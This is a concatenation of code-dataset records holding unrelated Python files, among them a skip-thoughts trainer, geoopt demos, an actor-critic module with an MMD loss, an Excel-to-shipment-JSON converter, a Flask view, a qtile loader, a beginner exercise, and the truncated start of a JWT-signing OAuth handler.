print(gen.send(html))","sub_path":"sample/chapter12/03_coroutine_test.py","file_name":"03_coroutine_test.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336154691","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom datetime import datetime, timedelta\n\nfrom .Sent2Vec.skip_thoughts.data_loader import DataLoader\nfrom .Sent2Vec.skip_thoughts.model import UniSkip\nfrom .Sent2Vec.skip_thoughts.config import *\n\nclass Skip_Thoughts:\n def __init__(self, batch_size=64, epochs=1000, input_data='../Data/data.txt',\n saved_model_loc='../../Saved_model/sent2vec_model'):\n self.batch_size = batch_size\n self.epochs = epochs\n self.saved_model_loc = saved_model_loc\n self.d = DataLoader(input_data)\n self.model = UniSkip()\n if USE_CUDA:\n self.model.cuda(CUDA_DEVICE)\n\n self.optimizer = torch.optim.Adam(params=self.model.parameters(), lr=LEARNING_RATE)\n\n self.loss_trail = []\n self.last_best_loss = None\n self.current_time = datetime.utcnow()\n\n def debug(self, i, loss, prev, nex, prev_pred, next_pred):\n\n this_loss = loss.item()\n self.loss_trail.append(this_loss)\n self.loss_trail = self.loss_trail[-20:]\n new_current_time = datetime.utcnow()\n time_elapsed = str(new_current_time - self.current_time)\n self.current_time = new_current_time\n print(\"Iteration {}: time = {} last_best_loss = {}, this_loss = {}\".format(i, time_elapsed, self.last_best_loss,\n this_loss))\n\n print(\"prev = {}\\nnext = {}\\npred_prev = {}\\npred_next = {}\".format(\n self.d.convert_indices_to_sentences(prev),\n self.d.convert_indices_to_sentences(nex),\n self.d.convert_indices_to_sentences(prev_pred),\n self.d.convert_indices_to_sentences(next_pred),\n ))\n\n try:\n trail_loss = sum(self.loss_trail) / len(self.loss_trail)\n if self.last_best_loss is None or self.last_best_loss > trail_loss:\n print(\"Loss improved from {} to {}\".format(self.last_best_loss, trail_loss))\n\n print(\"saving model at {}\".format(self.saved_model_loc))\n torch.save(self.model.state_dict(), self.saved_model_loc)\n\n self.last_best_loss = trail_loss\n except Exception as e:\n print(\"Couldn't save model because {}\".format(e))\n\n def train(self):\n\n print(\"Starting to train Skip_thoughts...\")\n for i in range(self.epochs):\n sentences, lengths = self.d.fetch_batch(self.batch_size)\n\n loss, prev, nex, prev_pred, next_pred = self.model(sentences, lengths)\n\n if i % 10 == 0:\n self.debug(i, loss, prev, nex, prev_pred, next_pred)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n\nclass Sent2Vec_Networks:\n def __init__(self, batch_size=64, epochs=1000, input_data='../Data/data.txt',\n saved_model_loc='../../Saved_model/sent2vec_model', algorithm='skip_thoughts'):\n self.model = None\n if algorithm == 'skip_thoughts':\n self.model = Skip_Thoughts(batch_size, epochs, input_data, saved_model_loc)\n\n def train(self):\n if self.model is not None:\n self.model.train()\n","sub_path":"Nlp_Model/Model/Sent2Vec_Networks.py","file_name":"Sent2Vec_Networks.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"509991823","text":"article_text_folders = \"./train-articles\"\narticle_maps = \"./data/train-task2-TC.labels\"\nimport io\nimport glob\nimport os\nimport pandas as pd\nf_in = io.open(article_maps, mode=\"r\", encoding=\"utf-8\")\nkey = \"article{}.txt\"\ndata={}\ncounter = 0\nfl_id_lst = []\nstart_range_lst = []\nend_rage_lst = []\ntext_ = []\nTC_ = []\nfor ln in f_in:\n '''\n for each line map the actual text file \n '''\n fl_id = 0\n start_range = 0\n end_rage = 0\n tab_seperated = ln.split('\\t')\n print(tab_seperated)\n fl_id = tab_seperated[0].strip()\n tc_text = tab_seperated[1].strip()\n start_range = int(tab_seperated[2].strip())\n end_rage = int(tab_seperated[3].strip().replace('\\n',''))\n tmp = key.format(fl_id)\n tmp_fl = os.path.join(article_text_folders,tmp)\n artice_text = io.open(tmp_fl, mode=\"r\", encoding=\"utf-8\")\n data = artice_text.read()\n propaganda_ = data[start_range:end_rage]\n artice_text.close()\n fl_id_lst.append(fl_id)\n TC_.append(tc_text)\n start_range_lst.append(start_range)\n end_rage_lst.append(end_rage)\n text_.append(propaganda_)\nf_in.close()\nframe_ = pd.DataFrame({'File_ID': fl_id_lst, 'Classification':TC_,'Start_IDX':start_range_lst, 'End_IDX':end_rage_lst, 'Associated_Propaganda':text_})\nwriter = pd.ExcelWriter('mapping_TC.xlsx', engine='xlsxwriter')\nframe_.to_excel(writer, sheet_name='task-2')\nwriter.save()\n","sub_path":"Word_Maps_TC.py","file_name":"Word_Maps_TC.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"506540733","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport geoopt\n\n\ndef demo_manifold_tensor(shape=(3, 2)):\n \"\"\"\n f(W) = sum(W @ a)\n Demonstrate manifold.projx(.) (manifold_tensor.proj_()), manifold.proju(.), manifold.retr(.).\n \"\"\"\n W_init = geoopt.ManifoldTensor(torch.randn(shape), manifold=geoopt.Sphere()) # oblique\n manifold = W_init.manifold\n W = geoopt.ManifoldTensor(W_init.proj_(), manifold=geoopt.Sphere(), requires_grad=True)\n a = torch.randn(2)\n b = (W @ a).sum()\n b.backward()\n print(f\"W: {W}\\nnorm: {W.norm(dim=1)}\")\n\n with torch.no_grad():\n stepsize = 0.1\n rgrad = manifold.egrad2rgrad(W, W.grad)\n W_next = manifold.retr(W, stepsize * rgrad)\n print(f\"W_next: {W_next}\\nnorm: {W_next.norm(dim=1)}\")\n\n diag_ele = torch.diag(W @ rgrad.T)\n assert np.allclose(diag_ele.numpy(), 0, atol=1e-6), f\"rgrad is not orthogonal to W: {diag_ele}\"\n\n\nclass LastLayer(nn.Module):\n def __init__(self, M, K):\n super().__init__()\n W_init = geoopt.ManifoldTensor(torch.randn((K, M)), manifold=geoopt.Sphere())\n manifold = W_init.manifold\n self.W = geoopt.ManifoldParameter(manifold.projx(W_init), manifold=geoopt.Sphere()) # (K, M), row-wise\n self.b = geoopt.ManifoldParameter(torch.ones((K,)))\n\n def forward(self, x):\n # x: (B, M), W: (K, M)\n return x @ self.W.T + self.b\n\n\ndef demo_manifold_param(M=2, K=4):\n \"\"\"\n Demonstrates initializing a ManifoldParameter, RiemannianSGD (optimizer).\n\n Parameters\n ----------\n M: int\n Feature dimension.\n K: int\n Number of classes.\n \"\"\"\n M, K = 2, 4\n model = LastLayer(M, K)\n with torch.no_grad():\n print(f\"{model.W}\\n{model.W.norm(dim=1)}\") # should all be unit-norm, row-wise\n\n opt = geoopt.optim.RiemannianSGD([param for param in model.parameters() if param.requires_grad], lr=0.01,\n momentum=0.95, nesterov=True)\n\n B = 3\n X = torch.randn((B, M)) # (B, M), W: (K, M)\n X_out = model(X)\n y_out = X_out.sum() # L = sum(x @ W.T + b)\n opt.zero_grad()\n y_out.backward()\n opt.step()\n\n with torch.no_grad():\n print(f\"{model.W}, {model.W.norm(dim=1)}\") # should be different from init but still unit-norm\n","sub_path":"run_cifar100/demos.py","file_name":"demos.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149032400","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\n\ndef _weight_init(module):\n if isinstance(module, nn.Linear):\n torch.nn.init.xavier_normal_(module.weight, gain=0.01)\n module.bias.data.zero_()\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity()):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act]\n return nn.Sequential(*layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\nclass GenerativeGaussianMLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.epsilon_dim = act_dim * act_dim\n hidden_sizes[0] += self.epsilon_dim\n self.net = mlp([obs_dim+self.epsilon_dim] + list(hidden_sizes) + [act_dim], activation, nn.Tanh())\n self.apply(_weight_init)\n\n def forward(self, obs, std=1.0, noise='gaussian', epsilon_limit=5.0):\n if noise == 'gaussian':\n epsilon = (std * torch.randn(obs.shape[0], self.epsilon_dim, device=obs.device)).clamp(-epsilon_limit, epsilon_limit)\n else:\n epsilon = torch.rand(obs.shape[0], self.epsilon_dim, device=obs.device) * 2 - 1\n pi_action = self.net(torch.cat([obs, epsilon], dim=-1))\n return pi_action\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n hidden_sizes[0] += act_dim\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n self.apply(_weight_init)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.LeakyReLU(negative_slope=0.2)):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n\n # build policy and value functions\n self.pi = GenerativeGaussianMLPActor(obs_dim, act_dim, hidden_sizes, activation)\n self.q1 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n self.q2 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n\n self.obs_mean = torch.FloatTensor([0.0])\n self.obs_std = torch.FloatTensor([0.0])\n\n def act(self, obs, deterministic=False, noise='gaussian', obs_limit=5.0):\n obs = ((obs - self.obs_mean.to(obs.device))/(self.obs_std.to(obs.device) + 1e-8)).clamp(-obs_limit, obs_limit)\n with torch.no_grad():\n if deterministic:\n a = self.pi(obs, std=0.5, noise=noise)\n else:\n a = self.pi(obs, noise=noise)\n return a.detach().cpu().numpy()[0]\n\n# Maximum Mean Discrepancy\n# geomloss: https://github.com/jeanfeydy/geomloss\n\nclass Sqrt0(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, input):\n result = input.sqrt()\n result[input < 0] = 0\n ctx.save_for_backward(result)\n return result\n\n @staticmethod\n def backward(ctx, grad_output):\n result, = ctx.saved_tensors\n grad_input = grad_output / (2*result)\n grad_input[result == 0] = 0\n return grad_input\n\ndef sqrt_0(x):\n return Sqrt0.apply(x)\n\ndef squared_distances(x, y):\n if x.dim() == 2:\n D_xx = (x*x).sum(-1).unsqueeze(1) # (N,1)\n D_xy = torch.matmul( x, y.permute(1,0) ) # (N,D) @ (D,M) = (N,M)\n D_yy = (y*y).sum(-1).unsqueeze(0) # (1,M)\n elif x.dim() == 3: # Batch computation\n D_xx = (x*x).sum(-1).unsqueeze(2) # (B,N,1)\n D_xy = torch.matmul( x, y.permute(0,2,1) ) # (B,N,D) @ (B,D,M) = (B,N,M)\n D_yy = (y*y).sum(-1).unsqueeze(1) # (B,1,M)\n else:\n print(\"x.shape : \", x.shape)\n raise ValueError(\"Incorrect number of dimensions\")\n\n return D_xx - 2*D_xy + D_yy\n\ndef gaussian_kernel(x, y, blur=1.0):\n C2 = squared_distances(x / blur, y / blur)\n return (- .5 * C2 ).exp()\n\ndef energy_kernel(x, y, blur=None):\n return -squared_distances(x, y)\n\nkernel_routines = {\n \"gaussian\" : gaussian_kernel,\n \"energy\" : energy_kernel,\n}\n\ndef mmd(x, y, kernel='gaussian'):\n b = x.shape[0]\n m = x.shape[1]\n n = y.shape[1]\n\n if kernel in kernel_routines:\n kernel = kernel_routines[kernel]\n\n K_xx = kernel(x, x).mean()\n K_xy = kernel(x, y).mean()\n K_yy = kernel(y, y).mean()\n\n return sqrt_0(K_xx + K_yy - 2*K_xy)\n\nif __name__ == '__main__':\n max_z = 0\n avg_z = 0\n min_z = 100\n batch = 1000\n for _ in range(1000):\n # x = torch.randn(batch, 2)\n x = torch.rand(batch, 2) * 2 - 1\n y = torch.rand(batch, 2) * 2 - 1\n z = mmd(x, y, kernel='gaussian')\n avg_z += z\n max_z = max(max_z, z)\n min_z = min(min_z, z)\n print(max_z)\n print(min_z)\n print(avg_z/1000.0)","sub_path":"gac/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"101244669","text":"import csv\nimport copy\nimport json\nimport os\nimport shutil\nimport openpyxl as exl\nimport easygui\nimport time \nimport random\nimport sys\n#import colorama\nfrom pathlib import Path\nfrom tabulate import tabulate\nfrom utils import build_text_menu\n#from colorama import Fore, Style\n\nclass Excel_Handler:\n def __init__(self,instance_num):\n if instance_num==0:\n self.conf=self.__init_conf(0)\n if self.conf is None:\n print('problem initializing')\n exit()\n self.requests=[]\n else:\n self.conf=self.__init_conf(instance_num)\n self.requests=self.load_instance()\n\n def __init_folder(self,rand):\n script_dir = Path(os.path.dirname(__file__)) \n folder_name = 'outfiles/'+str(rand)+'/'\n working_folder = os.path.dirname(folder_name)\n try:\n os.makedirs(os.path.join(script_dir,working_folder), exist_ok=False)\n except FileExistsError as e:\n try:\n shutil.rmtree(working_folder)\n os.makedirs(working_folder, exist_ok=False)\n except Exception as e:\n print(\"error initializing:\"+str(e))\n return None\n return os.path.join(script_dir,working_folder)\n\n def __init_conf(self,instance_num):\n rand = 0\n if instance_num==0: \n rand= random.randint(1, 1000000)\n print(\"instance \"+str(rand))\n working_folder=self.__init_folder(rand) \n else:\n working_folder= os.path.dirname('outfiles/'+str(instance_num)+'/')\n print(\"loading instance \"+str(instance_num))\n self.instance=rand\n resource_path=os.path.join(Path(os.path.dirname(__file__)),'resources') \n\n try: \n with open(os.path.join(resource_path,'country-codes.txt')) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n country_map = {rows[0].upper(): rows[1].upper() for rows in reader}\n except Exception as e:\n print(\"missing country file country-codes.txt\",e)\n # print(e)\n return None\n try:\n with open(os.path.join(resource_path,'delivery-request-schema.json')) as json_file:\n schema= json.load(json_file)\n except:\n print(\"missing schema file delivery-request-schema.json\")\n return None\n try:\n with open(os.path.join(resource_path,'shipment-request-schema.json')) as json_file:\n shipment_schema= json.load(json_file)\n except:\n print(\"missing schema file shipment-request-schema.json\")\n return None\n fields_map = {'OrderNumber':0,\n 'FirstName':1,\n 'LastName':2,\n 'CompanyName':3, \n 'AddressLine1':4,\n 'AddressLine2':5,\n 'AddressLine3City':6,\n 'AddressLine4State':7,\n 'Postcode':8, \n 'CountryCode':9,\n 'EndContactEmail':10,\n 'EndContactPhone':11,\n 'ShipmentItemsArray.ProductHarmonizedCode':12,\n 'ShipmentItemsArray.ProductDescription':13,\n 'ShipmentItemsArray.ProductUnitWeight':14, \n 'ShipmentItemsArray.ProductUnitValue':15,\n 'ShipmentItemsArray.ProductQuantity':16,\n 'ShipmentItemsArray.ProductItemOrigin':17,\n 'Currency':18,\n 'ParcelWeight':19,\n 'Length':21,\n 'Width':22,\n 'Height':23,\n 'Fourlogref':24,\n 'ShippingTerms':25,\n 'InvoiceNumber':26,\n 'Vat':27,\n 'PurchasedBy':28,\n 'Uom':29,\n 'UomDim':30}\n if instance_num==0:\n worksheet, original= self.load_excel()\n else:\n worksheet=None\n return [country_map,schema,shipment_schema,fields_map,working_folder,worksheet,original]\n\n def fix_request(self,schema,request):\n root_key=list(request.keys())[0]\n request[root_key]['s']['ParcelWeight']=request[root_key]['s']['ShipmentItemsArray'][0]['ProductUnitWeight']\n\n if request[root_key]['s']['LastName'] is None or request[root_key]['s']['LastName']==\"\":\n first_name=request[root_key]['s']['FirstName'].strip()\n if len(first_name.split(' '))>1:\n request[root_key]['s']['LastName']=request[root_key]['s']['FirstName'].split(' ')[-1]\n request[root_key]['s']['FirstName']=' '.join(first_name.split(' ')[:-1])\n\n if request[root_key]['s']['CountryCode']=='US':\n request[root_key]['s']['ShipType']=1\n else:\n request[root_key]['s']['ShipType']=2\n\n for value in request[root_key]['s'].items():\n #print(\"Value\",value,\"Type\",type(value))\n if isinstance(value,tuple):\n if value[0]==\"AddressLine1\" or value[0]==\"AddressLine2\" or value[0]==\"AddressLine3City\" or value[0]==\"EndContactEmail\" or value[0]==\"FirstName\":\n try:\n ''.join(value[1]).encode('ascii')\n except:\n #print(f\"{Fore.YELLOW}\",\"warning - non ASCII characters for order \",request[root_key]['s']['OrderNumber'],\"value:\",value,f\"{Style.RESET_ALL}\")\n print(\"warning - non ASCII characters for order \",request[root_key]['s']['OrderNumber'],\"value:\",value)\n else:\n if ''.join(value[1]).find('\\\\u')>0:\n #print(f\"{Fore.YELLOW}\",\"warning - characters \\\\u for order \",request[root_key]['s']['OrderNumber'],\"value:\",value,f\"{Style.RESET_ALL}\")\n print(\"warning - characters \\\\u for order \",request[root_key]['s']['OrderNumber'],\"value:\",value)\n\n def line_to_json(self,schema,line,country_map,fields_map,vendor,env,user):\n root_key=list(schema.keys())[0]\n delivery_request=copy.deepcopy(schema)\n delivery_request[root_key][\"userName\"]=user.username\n delivery_request[root_key][\"password\"]=user.password\n for schema_key,data_location in fields_map.items():\n input_val=line[data_location].value\n \n if isinstance(input_val, str):\n input_val=line[data_location].value\n input_val=input_val.strip()\n \n if '.' not in schema_key:\n #Verify that the field is mandatory and contain a value.\n if schema_key == 'EndContactPhone' and input_val is None:\n print(\"The field Phone is mandatory for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",str(input_val))\n return None\n\n if schema[root_key]['s'][schema_key]==-1:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=0\n else:\n if isinstance(input_val, str):\n tmp=\"\"\n for s in input_val:\n if s.isdigit() or s=='.': \n tmp=tmp+s\n try:\n numeric_value=float(tmp)\n except:\n #print(\"Position\",self.Position(fields_map, schema_key))\n print(\"Please add a correct value for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",tmp)\n return None\n else:\n numeric_value=input_val\n delivery_request[root_key]['s'][schema_key]=numeric_value\n else:\n if schema_key == 'CountryCode':\n country_name = str(input_val).upper()\n if country_name is not None and country_name in country_map.keys():\n country_code = country_map[country_name]\n delivery_request[root_key]['s']['CountryCode']=country_code\n elif country_name is not None and country_name in country_map.values():\n country_code = country_name\n delivery_request[root_key]['s']['CountryCode']=country_code\n else:\n print(\"No match for country:\",str(country_name),\" for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value:\",country_name)\n return None\n\n #The Country US have to include the State.\n if country_name == 'UNITED STATES' or country_name == 'US':\n state_name = delivery_request[root_key]['s']['AddressLine4State']\n if state_name is None or state_name.__len__()==0:\n print(\"The state is mandatory for the country United States\",\" for order \",delivery_request[root_key]['s']['OrderNumber'],\"Column:\",schema_key,\"Value: None\")\n return None\n else:\n if state_name.__len__() > 2:\n delivery_request[root_key]['s']['AddressLine4State']=self.ConvertState(state_name)\n\n else:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=\"\"\n else:\n delivery_request[root_key]['s'][schema_key]=str(input_val)\n else:\n node_key=schema_key.split('.')[1]\n if schema[root_key]['s']['ShipmentItemsArray'][0][node_key]==-1:\n if input_val is None:\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=0\n else:\n if isinstance(input_val, str):\n tmp=\"\"\n for s in input_val:\n if s.isdigit() or s=='.': \n tmp=tmp+s\n numeric_value=float(tmp)\n else:\n numeric_value=input_val\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=numeric_value\n else:\n if input_val is None:\n delivery_request[root_key]['s'][schema_key]=\"\"\n else:\n delivery_request[root_key]['s']['ShipmentItemsArray'][0][node_key]=str(input_val)\n return delivery_request\n\n def ConvertState(self, state):\n states = {\"Alabama\":\"AL\",\n \"Alaska\":\"AK\",\n \"Arizona\":\"AZ\",\n \"Arkansas\":\"AR\",\n \"California\":\"CA\",\n \"Colorado\":\"CO\",\n \"Connecticut\":\"CT\",\n \"Delaware\":\"DE\",\n \"Florida\":\"FL\",\n \"Georgia\":\"GA\",\n \"Hawaii\":\"HI\",\n \"Idaho\":\"ID\",\n \"Illinois\":\"IL\",\n \"Indiana\":\"IN\",\n \"Iowa\":\"IA\",\n \"Kansas\":\"KS\",\n \"Kentucky\":\"KY\",\n \"Louisiana\":\"LA\",\n \"Maine\":\"ME\",\n \"Maryland\":\"MD\",\n \"Massachusetts\":\"MA\",\n \"Michigan\":\"MI\",\n \"Minnesota\":\"MN\",\n \"Mississippi\":\"MS\",\n \"Missouri\":\"MO\",\n \"Montana\":\"MT\",\n \"Nebraska\":\"NE\",\n \"Nevada\":\"NV\",\n \"New Hampshire\":\"NH\",\n \"New Jersey\":\"NJ\",\n \"New Mexico\":\"NM\",\n \"New York\":\"NY\",\n \"North Carolina\":\"NC\",\n \"North Dakota\":\"ND\",\n \"Ohio\":\"OH\",\n \"Oklahoma\":\"OK\",\n \"Oregon\":\"OR\",\n \"Pennsylvania\":\"PA\",\n \"Rhode Island\":\"RI\",\n \"South Carolina\":\"SC\",\n \"South Dakota\":\"SD\",\n \"Tennessee\":\"TN\",\n \"Texas\":\"TX\",\n \"Utah\":\"UT\",\n \"Vermont\":\"VT\",\n \"Virginia\":\"VA\",\n \"Washington\":\"WA\",\n \"West Virginia\":\"WV\",\n \"Wisconsin\":\"WI\",\n \"Wyoming\":\"WY\",\n \"District of Columbia\":\"DC\"}\n stateConverted=state\n search=states.get(state)\n if (search is not None):\n if (search.__len__() >0):\n stateConverted=search\n return stateConverted\n\n def load_excel(self):\n orders_file_name = easygui.fileopenbox(msg=\"select orders file to upload\",)\n if orders_file_name is None:\n return None\n extension = os.path.splitext(orders_file_name)[1]\n try:\n if extension == '.csv':\n ordersfilename = os.path.join(os.path.splitext(orders_file_name)[0]+'.xlsx')\n wbk = exl.Workbook()\n sh = wbk.active\n with open(orders_file_name, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n row[8]=row[8].replace('\\\"','').replace('=','')\n sh.append(row)\n wbk.save(ordersfilename)\n wb = exl.load_workbook(filename=ordersfilename, data_only=True)\n orders_file_name = ordersfilename\n #os.remove(ordersfilename)\n else:\n wb = exl.load_workbook(filename=orders_file_name, data_only=True)\n active_sheet = wb[wb.sheetnames[0]]\n except Exception as e:\n print(\"Problem reading excel file:\"+str(e))\n return None\n return active_sheet, orders_file_name\n\n def convert_lines(self):\n if len(self.requests)>0:\n return self.requests\n converted=[]\n for e in self.conf:\n if e is None:\n print(\"no conf\")\n return None\n conf=self.conf\n out_folder=conf[4]\n delivery_schema=conf[1]\n shipment_schema=conf[2]\n country_map=conf[0]\n fields_map=conf[3]\n active_sheet = conf[5]\n vendor=input(\"vendor:[JWG]\")\n if vendor==\"\":\n vendor=\"JWG\"\n env=input(\"environment:[p]\") \n if env==\"\":\n env=\"p\"\n max_column = 31\n line_number = 2\n #verify profile of the user\n prof = profile()\n user = prof.manageprofile(env, None, vendor)\n if user is None or user.username==\"\":\n return None\n print(\"converting\")\n for row in active_sheet.iter_rows(2, active_sheet.max_row, 1, max_column):\n if row[0].value is None:\n continue\n #if 4log refernce exist\n print(\"4LogReference:\",str(row[24].value),\"OrderNumber:\",str(row[0].value))\n if row[24].value is not None:\n active_schema=shipment_schema\n else:\n active_schema=delivery_schema\n so_number=row[0].value\n converted_request=self.line_to_json(active_schema,row,country_map,fields_map,vendor,env,user)\n if converted_request is not None:\n self.fix_request(active_schema,converted_request)\n with open(os.path.join(out_folder,str(so_number)+'_request.json'),\"w\",) as request_file:\n request_file.write(json.dumps(converted_request,indent=2))\n converted.append(converted_request)\n else:\n print(\"skipping line number \"+str(line_number))\n line_number=line_number+1\n self.requests=converted\n return(converted)\n\n def load_instance(self):\n folder=self.conf[4]\n requests=[]\n try:\n for file in enumerate(os.listdir(folder)):\n if file.endswith(\"_request.json\"):\n requests.append(json.loads(open(os.path.join(folder,file)).read()))\n except:\n pass\n if len(requests)==0:\n print(\"nothing found\")\n self.requests=requests\n return requests\n\nclass profile:\n pass\n\n #manage the profile of the user. parameters: environment, schema and client name\n def manageprofile(self,env,schema_type,client):\n resource_path=os.path.join(Path(os.path.dirname(__file__)),'resources')\n\n #if environment is empty, the default environment is production\n if env==\"\":\n env=\"p\"\n #set the schema type: 1 - Delivery, 2 - SO\n schema=\"Delivery\"\n try: \n _username=\"\"\n _password=\"\"\n _vendor=\"\"\t\t\t \n #look in the profile if the user match the condition to convert Excel\n with open(os.path.join(resource_path,'profile.txt')) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n for rows in reader:\n if rows[0]==env:\n if rows[1]==schema:\n if rows[2]==client:\n _username=rows[3]\n _password=rows[4]\n if rows[3]==client:\n _vendor=rows[5]\n #if no match, send a message to the user in the screen\n if _username==\"\" and _vendor is None:\n print(\"No valid configuration for this user, schema and environment\")\n return None\n #profile matched\n result = profile()\n result.username = _username\n result.password = _password\n result.vendor = _vendor\n return result\n\n except Exception as e:\n print(\"missing profile file profile.txt\",e) \n return None","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":18166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491416359","text":"from flask import request\nfrom flask.views import MethodView\nfrom controllers.move import MoveController\n\nimport json\n\nclass MoveView(MethodView):\n\n @classmethod\n def make_move(cls):\n data = json.loads(request.data.decode('utf-8'))\n req_params = ['routine_id', 'name', 'start_time', 'end_time', 'total_time', 'order', 'video_url']\n for param in req_params:\n if param not in data:\n return json.dumps({\"response\": \"ill-formed request\"}), 400\n\n if not (isinstance(data['routine_id'], int) and isinstance(data['name'], str) and isinstance(data['start_time'], str) and isinstance(data['end_time'], str) and isinstance(data['total_time'], str) and isinstance(data['order'], int) and isinstance(data['video_url'], str)):\n return json.dumps({\"response\": \"ill-formed request\"}), 400\n \n error_message, status, response = MoveController.make_move(data['routine_id'], data['name'], data['start_time'], data['end_time'], data['total_time'], data['order'], data['video_url'])\n if error_message:\n return json.dumps({\"response\": error_message}), status\n\n return json.dumps({\"response\": \"success!\"}), 201\n\n##Bug Here\n @classmethod\n def get_moves(cls, routine_id):\n error_message, status, response = MoveController.get_moves(routine_id)\n if error_message:\n return json.dumps({\"response\": error_message}), status\n return json.dumps({\"response\": list(map(lambda x: x.json() if x else None, response))}), status #reponse\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"workit-back/views/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"129176005","text":"import importlib\n\nfrom libqtile.utils import QtileError\n\nCORES = [\n \"wayland\",\n \"x11\",\n]\n\n\ndef get_core(backend, *args):\n if backend not in CORES:\n raise QtileError(f\"Backend {backend} does not exist\")\n\n return importlib.import_module(f\"libqtile.backend.{backend}.core\").Core(*args)\n","sub_path":"libqtile/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162645334","text":"# Takes 7 whole numbers and decides if the number is a multiple of 3\n# If it is, add it to the total, if not disregard\n\nMAX_NUMBERS = 7\ncount = 0\ntotal = 0\n\nwhile(count < MAX_NUMBERS):\n #{rompts user to enter a number\n print(\"Please enter a whole number\")\n\n #Stores the number in a variable\n num = int(input())\n\n #Checks if there is any remainder from the number\n if (num % 3 == 0):\n total = total + num\n #Subtracts number from number to remove it from the running total\n else:\n num - num\n count = count+ 1\nprint(\"The total for all number that are multiples of 3 is:\", total)\n","sub_path":"Intro to Python Book Quiz/Question 4.py","file_name":"Question 4.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477664269","text":"import sys\r\nsys.path.insert(0, 'lib')\r\nimport webapp2\r\nimport base64\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Signature import PKCS1_v1_5\r\nfrom Crypto import Random\r\nfrom Crypto.Hash import SHA256\r\nfrom base64 import b64encode, b64decode\r\nimport json\r\nimport time\r\nimport logging\r\nimport httplib\r\nfrom google.appengine.api import urlfetch\r\nimport urllib\r\n\r\nclass GenerateAccessTokenHandler(webapp2.RequestHandler):\r\n @classmethod\r\n def sign_data(cls, private_key, data):\r\n rsakey = RSA.importKey(private_key,passphrase=None)\r\n signer = PKCS1_v1_5.new(rsakey)\r\n digest = SHA256.new()\r\n digest.update(data)\r\n sign = signer.sign(digest)\r\n return base64.b64encode(sign)\r\n\r\n def get(self):\r\n header = \"\"\"{\"alg\":\"SHA256withRSA\",\"typ\":\"JWT\"})\"\"\"\r\n logging.info('header:: %s', header)\r\n encoded_header = base64.b64encode(bytearray(header))\r\n logging.info('encoded_header:: %s', encoded_header)\r\n\r\n issuance_time = int(round(time.time() * 1000))\r\n #exp_time = issuance_time + 7200000\r\n\r\n claim = \"\"\"{\r\n \"iss\":\"OFFER_REC_SYS\",\r\n \"aud\":\"https://oauthas.searshc.com/oauthAS/service/oAuth/token.json\",\r\n \"exp\":\"\"\"+str(issuance_time)+\"\"\",\r\n \"iat\":\"\"\"+str(issuance_time)+\"\"\"}\"\"\"\r\n logging.info('claim:: %s', claim)\r\n encoded_claim = base64.b64encode(bytearray(claim))\r\n logging.info('encoded_claim:: %s', encoded_claim)\r\n\r\n combined_header_claim = encoded_header + \".\" + 